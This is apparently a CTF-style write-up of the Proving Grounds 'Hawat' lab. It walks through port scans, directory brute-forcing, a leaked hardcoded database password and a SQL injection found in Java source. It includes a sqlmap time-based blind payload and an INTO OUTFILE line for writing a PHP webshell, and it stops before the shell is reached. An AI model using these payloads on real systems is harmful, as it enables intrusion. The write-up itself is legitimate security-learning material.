> For the complete documentation index, see [llms.txt](https://rouvin.gitbook.io/ibreakstuff/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://rouvin.gitbook.io/ibreakstuff/writeups/proving-grounds-practice/linux/hawat.md). # Hawat ## Gaining Access Nmap scan: ``` $ nmap -p- --min-rate 3000 -Pn 192.168.157.147 Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-14 12:15 +08 Warning: 192.168.157.147 giving up on port because retransmission cap hit (10). Stats: 0:03:25 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 85.65% done; ETC: 12:19 (0:00:35 remaining) Nmap scan report for 192.168.157.147 Host is up (0.17s latency). Not shown: 65481 filtered tcp ports (no-response), 50 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 17445/tcp open unknown 30455/tcp open unknown 50080/tcp open unknown ``` Did a detailed scan on the non HTTP ports. ``` $ sudo nmap -p 17445,30455,50080 -sC -sV --min-rate 4000 192.168.157.147 [sudo] password for kali: Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-14 12:19 +08 Nmap scan report for 192.168.157.147 Host is up (0.18s latency). PORT STATE SERVICE VERSION 17445/tcp open unknown | fingerprint-strings: | GetRequest: | HTTP/1.1 200 | X-Content-Type-Options: nosniff | X-XSS-Protection: 1; mode=block | Cache-Control: no-cache, no-store, max-age=0, must-revalidate | Pragma: no-cache | Expires: 0 | X-Frame-Options: DENY | Content-Type: text/html;charset=UTF-8 | Content-Language: en-US | Date: Fri, 14 Jul 2023 04:20:05 GMT | Connection: close | | | | | Issue Tracker | | | |
|
| |
| href="/login" class="btn btn-primary" style="float:right">Sign In | href="/register" class="btn btn-primary" style="float:right;margin-right:5px">Register |
| |

| | | | | |
IDMessageP | HTTPOptions: | HTTP/1.1 200 | Allow: GET,HEAD,OPTIONS | X-Content-Type-Options: nosniff | X-XSS-Protection: 1; mode=block | Cache-Control: no-cache, no-store, max-age=0, must-revalidate | Pragma: no-cache | Expires: 0 | X-Frame-Options: DENY | Content-Length: 0 | Date: Fri, 14 Jul 2023 04:20:05 GMT | Connection: close | RTSPRequest: | HTTP/1.1 400 | Content-Type: text/html;charset=utf-8 | Content-Language: en | Content-Length: 435 | Date: Fri, 14 Jul 2023 04:20:05 GMT | Connection: close | HTTP Status 400 | Request

HTTP Status 400 |_ Request

30455/tcp open http nginx 1.18.0 |_http-title: W3.CSS |_http-server-header: nginx/1.18.0 50080/tcp open http Apache httpd 2.4.46 ((Unix) PHP/7.4.15) |_http-title: W3.CSS Template |_http-server-header: Apache/2.4.46 (Unix) PHP/7.4.15 | http-methods: ``` ### Web Enum -> Source Code Port 17445 had some kind of ticket creator:
Default creds didn't work, so let's move on. Port 30445 just didn't load for me for some reason. Port 50080 shows a Pizza website:
The website was rather static. I did a directory scan on all the ports. Port 50080 has a `/cloud` directory: ``` $ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.157.147:50080 -t 100 =============================================================== Gobuster v3.3 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.157.147:50080 [+] Method: GET [+] Threads: 100 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.3 [+] Timeout: 10s =============================================================== 2023/07/14 12:24:36 Starting gobuster in directory enumeration mode =============================================================== /images (Status: 301) [Size: 244] [--> http://192.168.157.147:50080/images/] /4 (Status: 301) [Size: 239] [--> http://192.168.157.147:50080/4/] /cloud (Status: 301) [Size: 243] [--> http://192.168.157.147:50080/cloud/] ``` When viewed, it shows a login page:
We can login with `admin:admin`. There, we see an `issuetracker.zip` file:
We can download this to our Kali machine and unzip it. This would reveal source code for a website. ``` $ ll total 32 -rw-r--r-- 1 kali kali 1495 Feb 2 2021 HELP.md -rwxr-xr-x 1 kali kali 10070 Feb 2 2021 mvnw -rw-r--r-- 1 kali kali 6608 Feb 2 2021 mvnw.cmd -rw-rw-r-- 1 kali kali 2248 Feb 5 2021 pom.xml drwxr-xr-x 4 kali kali 4096 Feb 2 2021 src ``` ### Source Code Analysis -> SQLI RCE The source code was in Java and for the application running on port 17445. I looked thorugh the files and found this within `src/main/java/com/issue/tracker/issues/IssueController.java`: ```java @GetMapping("/issue/checkByPriority") public String checkByPriority(@RequestParam("priority") String priority, Model model) { // // Custom code, need to integrate to the JPA // Properties connectionProps = new Properties(); connectionProps.put("user", "issue_user"); connectionProps.put("password", "ManagementInsideOld797"); try { conn = DriverManager.getConnection("jdbc:mysql://localhost:3306/issue_tracker",connectionProps); String query = "SELECT message FROM issue WHERE priority='"+priority+"'"; System.out.println(query); Statement stmt = conn.createStatement(); stmt.executeQuery(query); ``` This bit of code here gave us credentials, and also is vulnerable to SQL injection since the `priority` variable is not sanitsed before being passed in. I registed a user on the machine, and then proceeded to test the SQL Injection using `sqlmap`: ``` $ sqlmap -r req --- Parameter: priority (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: priority=' AND (SELECT 3165 FROM (SELECT(SLEEP(5)))JlSD) AND 'aCou'='aCou --- ``` Normally, this should be rather easy to write a webshell using a payload like this: ```sql ' union select '' into outfile '/srv/http/cmd.php' -- - ``` However I don't know the document root, and `sqlmap` brute force doesn't seem to work. I took a hint and realised that port 30445 was supposed to host `phpinfo.php`, but it was unresponsive. I read the walkthrough and it shows that `/srv/http` is the document root taken from `phpinfo.php`, which would allow me to write a webshell to port 30445. Here's a link to the supposed solution: {% embed url="" %} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://rouvin.gitbook.io/ibreakstuff/writeups/proving-grounds-practice/linux/hawat.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.